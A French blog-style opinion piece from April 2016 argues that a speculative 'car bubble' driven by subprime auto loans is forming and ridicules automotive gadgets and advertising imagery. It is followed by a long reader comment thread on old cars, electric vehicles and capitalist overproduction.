vendredi 22 avril 2016 - par Arthaud

La bulle automobile

 Elle s’est récemment ajoutée à nombre d’autres bulles, bulle des prêts étudiants, bulle des cartes de crédit, bulle de l’immobilier, à tel point qu’ils sont nombreux les analystes à prédire une crise financière de grande ampleur .. Ça gonfle ! Ça enfle ! Ça tend .. C’est le printemps, les désirs de la chair se réveillent, incoercibles, fous, irrépressibles, et débordent de partout .. Les désirs de voitures aussi puisque ça va avec à en juger par les pratiques de l’industrie de la réclame ! 

C’est pas moi qui le dit. Mettez Auto & filles dans Google : milliers et millions d’images comme celle que j’ai choisie pour illustrer mon propos .. Qu’on ne m’accuse pas ici de dévoiement, ou d’esprit de retape mal placé en raison de cette illustration : je ne fais qu’embrayer, suivre la file. 

En matière d’automobile, le slogan s’impose d’ailleurs naturellement : suivez la file ! Prenez la file .. files derrière, files devant, des files matin, midi et soir, des files et des files à ne plus savoir qu’en faire .. faciles.

Les ventes vont à fond la caisse avons-nous donc noté : Google actu ( marché véhicules occasion ) vous le confirmerait si vous en doutiez .. Idem pour le neuf, Google actu (marché automobile). Vous vérifierez.

La bulle automobile, C'est la bulle la moins connue dit le Figaro il y a à peine un mois, qui ajoute : “Elle est pourtant l'une des plus dangereuses du moment à en croire certains analystes. Les encours totaux des prêts automobiles aux États-Unis s'élevaient fin 2015 à 1060 milliards de dollars, selon la Fed de New York. Encouragés par la baisse des prix du pétrole, les taux bas et les facilités octroyées par les banques, les Américains se ruent sur le marché automobile, comme en témoignent les ventes record de voitures outre-Atlantique. Problème : les crédits souscrits atteignent des sommets alarmants. Plus grave encore, ils sont octroyés à tous, y compris aux personnes les moins solvables. Ces prêts à risque sont d'ailleurs appelés « subprime auto loans »... Comme ceux de l'immobilier, ils sont souvent titrisés par les banques et redistribués aux investisseurs via divers produits financiers.”

Les couples opportunités = menaces et menaces = opportunités vont souvent de pair. Le devenir du temps radieux, c’est le temps nuageux, voire les fortes giboulées ou la tempête. Pour l’instant, au dessus du marché de l’automobile, c’est blue sky. Pourvu que ça dure ! profitons en pour réfléchir ..

Et puis ? Crise=opportunité dit-on en Corée .. Anticipant le grand retournement, ils sont déjà à l’oeuvre les visionnaires, prêts à agir “à la Uber”, prêt à relever les défis, face aux mastodontes mononucléés et si peu agiles qui contrôlent actuellement le marché, et qui creusent dans l’euphorie des grands trous sous leurs pieds.

Lorsqu’on met UBER dans Google, sur 180 millions de résultats, on est invité, en tout premier, à s’inscrire pour devenir chaufeur .. Parions que d’ici peu Google nous invitera à rejoindre un réseau de particuliers capables de vous fournir une voiture ou de la réparer ..

Uberisation du marché de l’automobile, cela signifiera « opportunité » pour de tout-nouveaux arrivants (très-petit pourcentage), ceux qui auront su négocier les tournants, les As du volant .. Vol au décor pour la plus grande partie du système en place actuellement. Et c’est pas le petit boitier allume-cigare connecté sur les services d’urgence et présenté comme une innovation majeure qui va sauver la situation ..

Il est certain que présenter le nouveau véhicule de la marque « au triangle rectangle » ou celui de PM-Way coincé au milieu d’embouteillages monstres, tels qu’évoqués par l’image qui suit, ne serait pas très « vendeur ». Et pourtant !

 

La réalité du monde de l’automobile n’est pas à l’image de l’imaginaire des publicitaires, première constatation ! 

C’est à ce genre de contradiction qu’on reconnait l’existence de bulles, qu’elles soient automobile ou immobilière : il est obligatoire, pour que le marché se tienne, en automobile comme en immobilier, que la réalité soit quelque peu travestie, quelque peu « augmentée » ..

Le quotidien de l’automobiliste moyen n’est pas rose du tout, le temps s’assombrit, mais en apparence tout va bien, le marché de l’occasion suit le même mouvement, les puissants de l’économie sont aux créneaux, banquiers en tête.

Le marché de l’occase ! Voilà un marché qui, sans faire de bruit médiatique, explose les compteurs lui aussi. À tel point qu'on a dépassé la barre symbolique de 500.000 immatriculations au mois de mars, selon AutoScout24 qui publie ces chiffres. Même si, dans le même temps, un autre marché - celui des voitures neuves - a davantage encore progressé (+8%). Les Français ont clairement retrouvé le chemin des concessions ou des sites de petites annonces sur Internet. C’est RTL qui le dit il y a une heure ..

 

« Cette fois, plus d'hésitation : le marché automobile a bien redémarré et presque tous les feux sont au vert. Au fond du trou en 2013 en Europe » .. c’est le Monde qui publie cela, à l’instant, et qui poursuit extatique : Au fond du trou en 2013 en ­Europe, avec un peu moins de 12 millions de véhicules écoulés, il retrouve des couleurs pour afficher une croissance étincelante de 9,3  % en 2015 (équivalent à 13,7 millions d’unités), soit «  la plus forte de ces vingt-cinq dernières années  », selon le cabinet PwC Autofacts.

Mais les images épuisent leurs magie, l’industrie ne semble pas voir les effets quelque peu contreproductifs de l’entassement de joujoux dont, tôt ou tard, le sort est d’être laissés en plan.

Le marché automobile britannique a augmenté de 5,2%, à 518.707 unités, en mars, un record pour ce mois dit Capital.

L’Usine nouvelle : Avec 211 264 véhicules particuliers vendus au mois de mars, le marché automobile français est en hausse de 7,5% par rapport à l’année ..

Mais les messages subliminaux pas très motivants s’amoncellent : masques où il serait difficiler de se sentir bien, ennuis mécaniques qui contrastent avec les images de plaisir, de liberté et de facilité .. Les Medias ne sont pas toujours très futés, pas toujours très cohérents. Ils participent à leur insu à la casse du rêve. Une nouvelle vision de l’automobile, pas du tout idyllique, tend à remplacer l’ancienne. Et le mouvement “carfree” a de beaux jours devant lui.

 

Ils sont nombreux ceux qui participent à l’hallali, et les coups d’encensoirs peuvent faire autant de mal que les cailloux lancés sur la carrosserie.

 

Le journal des femmes tire la sonnette d’alarme et dit “Attention aux arnaques, le marché de l’occasion peut être très dangereux” .. Pas moins ! 

Saint-Frison : "Un énorme scandale qui va impacter l'ensemble du monde automobile »

A noter que ce « Silver-Geek » comme il se nomme est totalement absent de Google actualités sur le mois déroulant .. On attendrait mieux d’un Geek et d’un stratège en innovation ! 

Que penser de la profusion de gadgets présentés comme des « innovations » .. au CES de Las Vegas : en avant première, les "Lunettes by Valeo" : “ces lunettes, connectées, permettent d'améliorer la visibilité du conducteur”.

Vous voyez mal vous ?

l'équipementier propose également son système Sightstream, nouveau système de caméra qui remplace les rétroviseurs traditionnels. 

C’est pas bien un rétroviseur, un simple rétroviseur ?

“… Un petit boîtier qui permettra de posséder le système d'appel d'urgence (ecall) en seconde monte. Branché sur l'allume-cigare, le système pourra détecter les collisions et contacter seul les services de secours”.

« Une application Renault amusante et décalée », R.S. Monitor, qui permet de mesurer les performances au volant (sur piste !) et qui s'enrichit désormais d'un teeshirt connecté qui enregistre les pulsations cardiaques. 

Wouarfff .. Carfree a de beaux jours devant lui.

 

Georges Arthaud / Avril 2016

 

 

Quelques idées révolutionnaires qui ne manqueront pas d’ouvrir des pistes

La politique du « prêt à partir « TRIBUNE LIBRE. Venir, payer, emporter. Pour Eric Cerceau (la Wroom Team), l'avenir est au commerce de VO "prêts à partir" et donc à l'optimisation de la chaîne de préparation

Utiliser le réflexe et la dynamique « communautaire » partout où l’intérêt de l’utilisateur l’exige

Optimiser le temps d’utilisation de l’outil de production .. les camions roulent la nuit, les trains aussi, les magasins d’alimentation, .. Si un dentiste qui travaille jusqu’à 18 H veut passer chez le réparateur, impossible ..

Crowdfunding sur les véhicules anciens ou de collection

 

Sources

http://www.vendreaveclargus.fr/

http://www.lemonde.fr/flottes-d-entreprise/article/2016/04/06/le-marche-automobile-retrouve-des-ailes_4897163_1779527.html 

http://www.usinenouvelle.com/article/le-marche-automobile-francais-en-hausse-au-premier-trimestre-2016-tire-par-renault-et-psa.N385733 

http://www.w116.org/

http://www.liberezvousdesideesrecues.com/

http://www.feda.fr/

http://www.strategies.fr/emploi-formation/management/1005723W/eric-saint-frison-silver-geek.html 

http://www.liberezvousdesideesrecues.com/nous-decouvrir/fnaa/

file :///Users/flore/Downloads/FICHIERS-10.%20structure_apres_vente.pdf

http://www.feda.fr/section.php?id=238

http://www.europe1.fr/emissions/l-invite-d-europe-1-nuit/saint-frison-un-enorme-scandale-qui-va-impacter-lensemble-du-monde-automobile-2518867

http://pro.largus.fr/actualites/vehicules-doccasion-a-quand-la-politique-du-pret-a-partir-5970385.html 

https://www.google.fr/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=wsi%20canada

http://www.wsiworld.com/

http://auto-infos.fr/-CNPA,8-

http://www.journaldesfemmes.com/loisirs/auto/1558651-conseils-achat-voiture-occasion/

http://www.lawroomteam.eu/Un-nouveau-reseau-est-ne

 

Citations graphiques de l'Internet

http://yusrian9.blogspot.fr/&nbsp ;

http://www.cedexis.com/blog/internet-congestion-how-gaming-companies-can-avoid-the-traffic-jam/&nbsp ;

http://www.buddyweb.fr/uber-nous-debarrasse-des-taxis-mais-qui-nous-debarrassera-d-uber/

http://fr.dreamstime.com/photo-stock-fiat-d%C3%A9tails-de-jouets-image46560310

https://secure.avaaz.org/fr/petition/Francois_Hollande_Nous_voulons_une_indemnite_kilometrique_velo_de_025_eurokm/?fpla



75 réactions


  • colere48 colere48 22 avril 2016 13:22

    Sur qu’on aime tous coincer la bulle.... surtout quand elle prend l’aspect de la phot. 1 ....


    • Arthaud Arthaud 22 avril 2016 16:59

      @colere48


      Vous demandiez des nouvelles de Cahuzac .. ? Adrien ou Jérôme ? .. Rover, l’élégance britannique ..

      NB : vous avez vu que c’est un modèle assez cher .. Faut pas être coincé financièrement

    • colere48 colere48 22 avril 2016 17:14

      @Arthaud

      Non pas coincé...

      Mais c’est le propre (enfin si on peut dire...) de ces ministères
      Jérôme le voleur menteur, toujours en liberté...
      Emmanuel le gigolo félon pressé , mais sans « balls »...
      Et pour couronné le tout
      Michel et la petite culotte , un « culottegate » l’enfumage absolu....

      pour ce gouv. ça sent le sapin tout de même, non ?


    • Arthaud Arthaud 22 avril 2016 18:37

      @colere48


      Quelle affaire ! Michel qui claque une culasse .. quelle affaire ..

  • alinea alinea 22 avril 2016 15:30

    Pourvu que ma vieille break qui a trente ans aujourd’hui ( juré, c’est vrai !) dure jusqu’à ma fin !!
    Les nouveaux joujoux ont toujours attiré les gosses ! et la conscience et la responsabilité ne sont pas l’apanage des gosses !!


    • marmor 22 avril 2016 16:11

      @alinea
      1986, fin de vie de la W 123, remplacée par la W 124
      200 D , 240 D , 300 D, et summum, le Breack 300 TD, 6 cylindres turbo, seul le break a profité de ce moteur !
      Increvable !! entre 1 et 2 millions de kilometres. Voiture préférée des taxis.


    • Arthaud Arthaud 22 avril 2016 17:09

      @alinea


      Allons, allons Alinéa, parce que là ! si vous avez le même âge que votre break, personne garantira

      Quant à votre observation sur les gosses et le sens de la responsabilité, on ne peut que vous féliciter .. en ajoutant cependant que, pour les vieux, c’est pareil ! Je sais de quoi je cause : un copain mien, mais bien plus vieux, vient de s’acheter une porche, du plus cher modèle ! .. Il a l’air fin .. Un autre mien copain une mustang, 150 000 dollars .. faut être inconscient (il l’est), mais content .. donc ! 

      NB : en parlant de votre vieux break (masculin, j’y tiens .. ) j’ai une jeune mercedes, 42 ans aux noix .. je vous dis ça .. au cas où

      Merci, bien à vous 

    • Arthaud Arthaud 22 avril 2016 17:14

      @marmor


      Ah ! ben oui .. on parle des mêmes choses ! moi, une w 116 comme je disais à Alinéa .. Puis j’ai eu un Lada après (masculin, j’y tiens ..) .. l’évolution de l’industrie automobile aurait du s’en tenir là, pas aller au-delà, tout figer au niveau du Lada

      Vous me suivez ?

    • Arthaud Arthaud 22 avril 2016 17:18

      @marmor

      Ah ! on parle des mêmes choses ! Moi, une W 116 comme je disais à Alinéa .. Après, un Lada 
      ( masculin, j’y tiens ). 

      L’industrie automobile aurait du figer tout au niveau du Lada, pas aller plus loin .. aucun besoin. Peut-être le faire fabriquer par les Allemands si on veut pinailler un peu .. Vous me suivez ?

    • alinea alinea 22 avril 2016 17:34

      @Arthaud
      C’est un break Mercedes aussi ! 30 ans, j’ai l’air de quoi !! J’ai un voisin qui a bien plus vieux, mais lui, c’est un sacré bricoleur ! Moi je n’ai fait que changer tous ses petits tuyaux à ma louloutte ( féminine, j’y tiens ! smiley ) et pour cent euros j’ai fait refaire l’alternateur !
      J’aimerais bien voir un de ces nouveaux modèles qui en fasse autant !
      Des gosses oui, je n’ai pas précisé l’âge !
      Après elle, je n’aurai que quatre quatre quatre avec airbag et ABS ( comme ma Mercedes) mais décapotée d’office, avec une seule place à cheval sur le dos !! smiley


    • alinea alinea 22 avril 2016 17:38

      @marmor
      La mienne ( j’y tiens !!) est une 200D, je rame en côte mais en descente, elle va plus vite qu’un cheval au galop, et ça, c’est inestimable ! smiley


  • Ruut Ruut 22 avril 2016 16:48

    Vue que tout le park thermique doit dans les 20 ans être entièrement remplacé par des modèles électriques, hybrides voir a H2, a moins de ne pas investir dans les bonnes technologies, les constructeurs automobiles ont de beaux jours devant eux. (Sauf peut etre les constructeurs historiques dits Français qui ont délocalisé leur production et semblent technologiquement a la ramasse.)


    • Arthaud Arthaud 22 avril 2016 17:33

      @Ruut


      Là, vous ouvrez le débat et l’envenimez tout de go ! 

      La crise climatique ne fait pas reculer l’industrie automobile, estime l’auteur de cette tribune. Pour preuve, l’organisation ce samedi en plein Paris d’une course de voitures électriques, alors que cette énergie n’est en rien vertueuse écologiquement.

      Petit article bien ficelé paru il y a qqs heures ! 

      Et qui poursuit : 

      « Tout est bon pour promouvoir la voiture électrique et, avec elle, l’imbécillité de la voiture individuelle, de la puissance et de la vitesse dans les zones urbaines, quitte à recouvrir d’un goudron lisse et noir les pavés de la perspective magistrale voulue par l’architecte Hardouin-Mansart au XVIIe siècle. »

      Carfree ! au secours ! je m’étouffe ..

      Tenez, globalisons, sans sortir du sujet : 

      La France contre les robots est un essai de Georges Bernanos publié en 1947. Il s’agit d’un recueil de différents textes formant une violente critique de la société industrielle. Bernanos y estime que le machinisme limite la liberté des hommes, et perturbe jusqu’à leur mode de pensée. Pour lui, la civilisation française est incompatible avec une certaine idolâtrie anglo-saxonne pour le monde de la technique.

      Il y conteste l’idée selon laquelle la libre entreprise conduirait automatiquement au bonheur de l’humanité, car, selon lui « il y aura toujours plus à gagner à satisfaire les vices de l’homme que ses besoins ». D’autre part, il explique qu’« un jour, on plongera dans la ruine du jour au lendemain des familles entières parce qu’à des milliers de kilomètres pourra être produite la même chose pour deux centimes de moins à la tonne », préfiguration étonnante de ce que seront les délocalisations quarante ans plus tard.

      Il y prédit aussi une révolte des élans généreux de la jeunesse contre une société trop matérialiste où ceux-ci ne peuvent s’exprimer.


    • izarn izarn 23 avril 2016 11:52

      @Arthaud
      S’il y avait des voitures éléctriques dans les villes, cela polluerait drolement moins ! Moins de maladies, de micro particules, moins de bruits, moins l’odeur puante du diesel.
      Quand aux transports en commun, c’est très pratique dans les campagnes, hein ?
      Bernanos a découvert Karl Marx ; tant mieux pour lui.


    • Arthaud Arthaud 23 avril 2016 12:17

      @izarn


      .. de plus en plus friands de voitures 100% élec ..

      Z’ont qu’ à croire ces couillons

      C’est le Figro qui le dit à l’instant


    • titi titi 24 avril 2016 01:10

      @Ruut

      « Sauf peut etre les constructeurs historiques dits Français qui ont délocalisé leur production et semblent technologiquement a la ramasse »

      Ils sont loin d’être technologiquement à la ramasse.

      La différence entre les constructeurs Français et les autres, c’est qu’en France les gouvernements sont capables de lancer une campagne contre le diesel juste au moment ou un de nos constructeur lance le diesel hybride en exclusivité.
      Au point que ce dernier l’a abandonné en 2015... juste au moment où les marques allemandes lancent le leur. Bien joué.

      Ce même constructeur à dans ses cartons un hybride essence + air comprimé.... mais n’a pas les fonds pour l’industrialiser... la BPI elle est où ? Ah oui elle finance des voitures moches en plastique produites en Charente.


    • Ruut Ruut 25 avril 2016 08:34

      @titi
      En utilisant les fonds des salaires abusif des patrons ils auraient largement les moyens de financer tout projets.
      Il suffit juste de ramener leur salaire au salaire moyen des employés de la boite sous traitance comprise.
      Et par miracle des fonds immenses seraient disponibles.


    • Arthaud Arthaud 22 avril 2016 18:23

      @roby

      Merci pour ce lien impressionnant qui, à lui seul, explicite parfaitement le sujet ! Si c’est pas une bulle ça .. A vue de nez, 1 000 milliards d’immobilisation

      Les révélations ont été disputées, par Jalopnik notamment .. mais j’y crois. Elle viennent de zerohedge ..

      Les images sont stupéfiantes, les google maps également. 

    • Croa Croa 22 avril 2016 19:39

      À roby,
      Les voitures sont produites sur commande (avec vos options.)
       Cette histoire d’invendus ne tient pas debout ; C’est forcément une intox.


    • julius 1ER 23 avril 2016 10:09

      @Arthaud

      impressionnant ce lien .... mais pas surprenant lorsque l’on sait comment fonctionne le système Capitaliste !!!! 
      ce qui m’impressionne le plus .... ce sont les commentaires !!! 

       la plupart des gens sont dans le déni du genre...

       vous savez bien qu’il y a des zones tampons de véhicules en attente d’être vendues.....
      ou les constructeurs ne sont pas fous ils ne construiraient pas des véhicules qu’ils ne vendraient pas ... etc......
      rien compris au dumping et autres joyeusetés du productivisme capitaliste !!!!

      j’ avais calculé il y a une dizaine d’années qu’il se produisait dans le monde (en additionnant toutes les productions de véhicules dans tous les pays) plus de 100 millions de véhicules/ AN cad que si tous ces véhicules étaient vendus on avait 1 milliard de véhicules en plus sur les routes tous les 10 ans ....
      au bas mot on doit avoir si on considère qu’en Afrique ou en Inde on arrive à faire vivre des véhicules pendant plus 30/40 ans .. 

      on doit avoir entre 3 et 5 milliards de véhicules en circulation sur la planète !!!!
      mais le plus important dans tout cela et c’est là que l’on trouve les limites du système Capitaliste et de l’économie dîte de marché ..... 

      c’est que le système de l’offre fonctionne avec une demande « dite solvable » et c’est là que le bât blesse car lorsqu’il s’agit de prunes ou de poireaux la surproduction peut-être résorbée en faisant des confitures ou des soupes ..... mais des « bagnoles » ?????

       eh bien en économie Capitaliste « classique » si l’on ne veut pas que les cours s’effondrent .... il faut envoyer tout çà à la casse (mais là c’est peut-être difficile car si un internaute vend la mèche on a une bombe atomique médiatique qui explose ) 

       et c’est peut-être déjà ce qui est train de se passer puisque nous sommes en train de disserter sur Avox de la surproduction en système Capitaliste .... 

      alors si l’on commence à envoyer des millions de « bagnoles neuves » à la casse (en les laissant pourrir sur place dans des lieux de stockage c’est la même chose .. soyons clairs )
      là je pense qu’il y a quelques internautes sur Avox dont le cerveau va exploser.... en particulier ceux qui découvrent l’eau chaude ......

       ils vont nous dire Marine vi...................te !!!!!!!!!!!!!!!!!!

    • izarn izarn 23 avril 2016 11:45

      @julius 1ER
      T’as pas encore compris, que la majorité des gens payent à crédit ? Que les gens sont de moins en moins « riches ». Et qu’on donne des crédits n’importe comment : « Votre auto pour 200 euros par mois » etc....Ensuite si on ne peut plus payer, les banquiers s’en foutent, il a titrisé le crédit à La City. C’est transformé en CDO toxiques, rachetés en douce par la Fed, la BoJ, et la BCE....
      QE illimités....
      On pédale dans la choucroute, on fabrique de la fausse monnaie basée sur du vide....
      Donc le marché de l’auto se maintient comme ça, pour cacher l’augmentation de la pauvreté générale, due à la globalisation financière. la dérégulation capitaliste.
      Bref le n’importe quoi de « la main invisible » du marché.
      Le marché est pipé, il faut le savoir.


    • marmor 23 avril 2016 16:06

      @izarn
      90% des voitures neuves sont « vendues » à crédit ou en location longue durée.
      Taux d’impayés : moins de 5% (saisie du véhicule ) Donc 95% vont au bout de leur engagement.
      Vous dites n’importe quoi !!


  • julius 1ER 22 avril 2016 17:58

    l’automobile, peut-être un mythe en train de disparaître ....songeais-je en regardant cette image d’un vaste boulevard encombré de véhicules , encombré me semble être un mot un peu faible ???


    saturé ou complètement paradoxal me semble le plus adapté car de paradoxal en démentiel le fait est que le rêve automobile puissamment vendu par les spots publicitaires où l’on voit un magnifique véhicule se mouvoir dans des rues désertes de villes fantômes où à la campagne sur de petites routes sinueuses à peine entretenues .... quel mensonge et quelle hypocrisie alors que le quotidien de l’automobiliste est devenu un enfer sur les routes entre embouteillages ..... et radars aux rares moments où l’on peut rouler « normalement » !!!!!!

    à voir ces images on comprend que l’automobile privée n’est plus une solution pour la ville mais est bel et bien devenue « le problème »de la ville.... et telle l’autruche factuelle on ne peut continuer à considérer que la ville doit être réglée et adaptée aux besoins de l’automobile mais bien le contraire et le devenir de l’automobile en ville ne peut être que l’autolib en tant que moyen complémentaire des transports collectifs .... c’est ainsi et ce sera !!!!!!

    ou ne sera pas ????? et alors là ce sera une mauvaise nouvelle car cela voudra dire que l’intérêt du vivre ensemble n’aura pas été pris en compte et que finalement les intérêts particuliers auront prévalu au détriment de l’intérêt général .....qui pour le coup devra subir le Diktat du lobby automobile et bancaire .....

    qui pour le coup ne propose aucune issue si ce n’est encombrer et saturer, grâce à la croissance du parc auto, encore plus des villes déjà à l’agonie dans le grand embouteillage permanent ..... 

    gouverner c’est prévoir qu’ils disaient ?????

    • Arthaud Arthaud 22 avril 2016 18:35

      @julius 1ER


      Vous dessinez bien le paysage de la catastrophe

      Qui va payer les dégâts (déjà irréparables) ?

      Pas les riches de l’hyperclasse mondialisée en tout cas .. sont à l’abri ces brebis

      Gouverner ? pfft .. le bateau est bourré, ivre titubant, pété, came en tête, meumeu à toutes les images ..Y’a qu’a voir celle que j’ai mise en tête du papier, que j’ai pourtant pas inventée .. et qui me vaut moult reproches

      Celui qui parle de la nef des fous ; faudra le fusiller .. ceux qui la font risquent rien

    • izarn izarn 23 avril 2016 11:33

      @julius 1ER
      Il suffit d’avoir de petites voitures electriques, limitées en vitesse à 60 km/heure
      Mais les crétins n’en veulent pas.
      Les cons ça ose tout....


    • bakerstreet bakerstreet 23 avril 2016 12:12

      @julius 1ER
      On ne peut que se rappeler les dessins de Reiser, surtout ceux qu’il faisait au début des années 70, dans « on vit une époque formidable », album qui en dit plus qu’une thèse de sociologie sur ces années là, sur l’humour qu’il trimbalait, et sur les thèmes qui se sont malheureusement caricaturés. 

      Mais ce n’est pas cette caricature qui fait hurler maintenant, c’est celle de ceux qui dénoncent, des fous qui proclament la vérité. On supporte la pollution, la violence, mais pas ceux qui tentent de faire tomber les masques à poussières. 
      Quand les riches il y a 50 allaient au sport d’hiver, c’était chic. Maintenant que les pauvres qui singent les riches y vont c’est une catastrophe ! Idem d’autant plus pour les bagnoles bien sûr...
      Tout ce qui peut paraître au départ comme une progrès devient à l’usage général une telle catastrophe à travers les effets induits qu’on en vient à tort ou à raison à regretter le monde d’avant. Au delà de l’aspect suggestif de cette démarche qui vous taxe de rêveur, et qu’on ira caricaturer pour mieux s’en moquer, vous transformant en « bobo », reste que l’avenir de l’humanité et même du vivant est maintenant en question. 
      La voiture est de ces problèmes qu’on a laissé grandir, d’une façon anarchique, sans plan d’ensemble, s’en remettant à la sainte foi dans la science, pour résoudre les contradictions, comme un engrais..... Le nucléaire prenant la suite infernale de cette foi stupide qu’on peut appeler « dégagement en touche »...( ce n’est pas pour rien que le foot, sport où la tricherie et le simulacre sont si valorisés fait fureur) C’est remarqué une méthode qui a assez réussi à l’humanité pendant un millénaire, mais c’était l’époque où les surfaces et les volumes étaient exponentielles, dont le mythe de la frontière, aux states, est l’incarnation, ce pays restant d’ailleurs en terme de déni champion toutes catégories, ce qui est compréhensible, car la spoliation et l’assurance d’être « élu de dieu » étant dans son ADN....Nous avons abandonné les transports en commun, mais aussi les buts communs, pour nous en remettre à l’atomisation de la société, dans ce leurre qu’est la voiture, un symbole mais une réalité centrale, avec un éparpillement des structures, le culte de l’individualisation, promesses de marchés nouveaux, se moquant toujours de la banalisation, et des conséquences. La ceinture suffira t’elle à nous protéger ?.... 

    • alinea alinea 23 avril 2016 14:58

      @bakerstreet
      L’image que je préfère pour expliquer tout ça est : tout le monde veut aller, beaucoup y vont, sur la plage déserte !
      Cela nous pose des questions sur la conscience de soi !


    • bakerstreet bakerstreet 23 avril 2016 20:54

      @alinea
      Comme disait je ne sais plus qui, le problème vient que l’homme n’est plus capable de rester seul dans une chambre. Le selfie est la dernière preuve de la folie des Narcisse. Avoir sans cesse besoin de réassurance sur ses aptitudes est pathétique ; jamais autant d’ego et autant de vide. Etre en réseau se déplacer exister on n’est bien loin de la fureur poétique et des extases de Blaise Cendrars dont je me souviens que vous avez comme moi beaucoup d’admiration. 

      Une chose ou deux qui aident à vivre, et à soulever le couvercle oppressant du monde. Quand tu aimes il faut partir..

      Quand tu aimes il faut rêver aussi, se tenir parfois à l’écart de la foule et du tumulte.


    • Arthaud Arthaud 23 avril 2016 21:27

      @bakerstreet


      Vous êtes un clinicien hors pair .. J’ai lu vos articles avec délectation je dois dire, sur le diesel catastrophe sanitaire

      NB : toutes ces femmes associées à l’industrie de la réclame et au mythe-délire de la bagnole m’ont fait penser à un mot de Rimbaud : 


      .. ça va pas nous faire que des amis .. Qu’en pense Alinéa ? concernée au premier chef par la féminité ?

    • bakerstreet bakerstreet 24 avril 2016 00:11

      @Arthaud
      Merci pour le compliment qui fait toujours plaisir, la reconnaissance étant est des mécanismes de la création, à condition que celle ci ne lui soit pas assujettie. 

      Voilà pourquoi il faut parfois se révolter contre soi même. 
      Arthur fait partie des ces étoiles qu’on peut toujours voir le soir briller dans le ciel, et qui illumine la jeunesse qui la découvre extasié, avec son paletot idéal. 
      Certains ne meurent jamais. Il sont en nous ils sont en vous. Peut être que la création est un troisième sexe ou bien les englobe tous à la foi. En ce moment je viens de terminer le livre sur Charlotte Salomon, une étoile elle aussi. On aurait bien voulu qu’elle soit moins filante. Mais elle a été bouffé par un trou noir. Qu’importe, elle continue à développer une belle énergie. 
      L’intégralité de l’œuvre de Charlotte Salomon dans un livre ...

    • alinea alinea 24 avril 2016 12:53

      @bakerstreet
      Il se trouve que ceux-là, je les connais bien !!!

      http://www.kisskissbankbank.com/charlotte-salomon-au-festival-d-avignon


    • alinea alinea 24 avril 2016 13:35

      @Arthaud
      La créativité est-elle virile ?
      On peut se poser la question ; il y est question de risque et d’humilité mais proposer son talent à la matière n’est pas un gage de créativité.
      Peu de gens créent leur vie, peut-être bien qu’ils sont tous en servage. Mais mâle et femelle, je crois bien, n’ont rien à voir là-dedans !
      La femme procrée, ou bien se reproduit, quel mystère distingue cette différence pour un même acte ?


    • Arthaud Arthaud 25 avril 2016 00:15

      @alinea


      Hermétique votre message Alinea .. oui en tout cas tous en servage, consenti ou pas, conscient ou pas, et la voiture est l’un des plus imposant symbole de l’aliénation

      Hermétiques vos textes

      Bien à vous


    • alinea alinea 25 avril 2016 10:27

      @Arthaud
      Toutes mes excuses !! j’avais lu votre réponse à Bakerstreet, et comme vous me nommiez, je répondais au sujet de la créativité !!


  • Le421... Refuznik !! Le421 22 avril 2016 18:00

    Ah...
    Heureusement qu’il y a l’obsolescence programmée.

    Autrefois, des rotules de direction trop faciles à user, ça se voyait.

    Maintenant, avec l’électronique omniprésente, c’est d’une facilité !!

    Les 4L roulent encore très bien, merci !!


    • marmor 22 avril 2016 18:38

      @Le421
      Vous avez des rotules electroniques sur votre voiture ?


    • Arthaud Arthaud 22 avril 2016 18:57

      @marmor


      Si, si, le 421 a raison, y’a des rotules à pistons, et d’autres à électronique .. c’est la magie de la mécanique .. regardez là ! la preuve ...

      On reste dans le sujet ..


    • Croa Croa 22 avril 2016 20:01

      À Le421
      La 4L est un mauvais exemple. Elles peuvent durer et le fait est qu’on en voit encore qui roulent sauf que ce genre de véhicule est une galère à entretenir : IL Y A TOUJOURS UN TRUC QUI CLOCHE !
      J’en ai eu une. À 250 000 km elle avait usé 2 moteurs (!) et il n’y avait plus rien d’origine (ah, si la boîte !) et je m’en suis débarrassé bien content !
      Sinon 504 : pas ou très peu de problèmes. AX : pas ou très peu de problèmes... (Celle-ci peut tout de même avoir des problèmes de refroidissement.)
      *
      Les automobiles modernes ? Je ne m’y risquerait pas ! (probablement pas de problèmes les 200 000 premiers km mais lorsque les dispositifs électroniques (de plus en plus présents) commenceront à être âgés la voiture pourrait bien tout d’un coup refuser d’aller plus loin ! smiley )


    • julius 1ER 23 avril 2016 09:21

      @Croa


      la 4L était une voiture avec les critères mécaniques de l’époque ... c’est sûr que ce n’était pas d’une grande fiabilité mais à y regarder de plus près elle n’était pas très gourmande et pas très lourde et surtout elle était pratique .... 
      comparer avec des voitures d’aujourdhui de même cylindrée elles sont toutes obèses !!!
      lourdes et de moins en moins adaptées pour rouler à 30 ou 80 klm/H .... cherchez l’erreur !!!

    • Croa Croa 23 avril 2016 09:44

      À julius 1ER
      « elle n’était pas très gourmande »’’Pas très’’ est juste surtout si on la compare à une coccinelle allemande qui était un gouffre comparé ! Mais pas spécialement sobre non plus et comme automobile d’entrée de gamme la 2CV faisait bien mieux.
      *
      Je pense comme toi que les automobiles de maintenant sont des monstres hideux et encombrants.
      J’aime bien me rendre sur les points de rassemblements de vieilles bagnoles. C’est juste pour les regarder : Dans mon coin il y en a souvent, en particulier à Audenge tous les mois. L’élégance d’une « floride » ou d’une « caravelle », nous ne reverrons jamais ça ! smiley 


    • julius 1ER 23 avril 2016 10:52

      @Croa


      rappelles- toi ..c’était encore carburateur et vis-platinées !!!
      pas d’électronique embarquée mais il vrai que si l’on avait suivi le cheminement de la voiture pratique par excellence genre Renault 5 Gtl qui à mon avis à l’époque et sans tricherie consommait à peine 5 L/100 Klms on aurait des véhicules qui ne devraient pratiquement plus consommer cad 1ou 2 litres au 100 Klms peut -être même avec des mélanges bio ..... mais le jeu trouble des multinationales et des monarchies pétrolières en ont décidé autrement !!!!!

      quand aux véhicules électriques tels qu’ils sont facturés en ce moment ce n’est certainement pas la solution à moins de devenir totalement autonomes cad qu’ils puissent produire leur propre énergie 
      mais là encore les lobbys et les intérêts particuliers ne voient certainement pas le problème dans cette optique !!!!


  • ENZOLIGARK 22 avril 2016 18:21

    ... Turboboy - Турбобой - ( Music / video by Leningrad . ... AhAhAhAhAh ... . ИСС АФФ ...


    • Arthaud Arthaud 22 avril 2016 18:51

      @ENZOLIGARK


      Jeff .. de flech is aff ? ( Я имею в виду po russki ИСС АФФ  ? )

      NB : vos tourbaboilles .. j’ai vu .. y cassent des tires .. en direct ! faut être osés ! On préfère Rammstein, plus intello ..

      Mais ça reste dans le sujet, merci dlia родео


  • Arthaud Arthaud 23 avril 2016 08:49

    Merci Kamarade, merci 


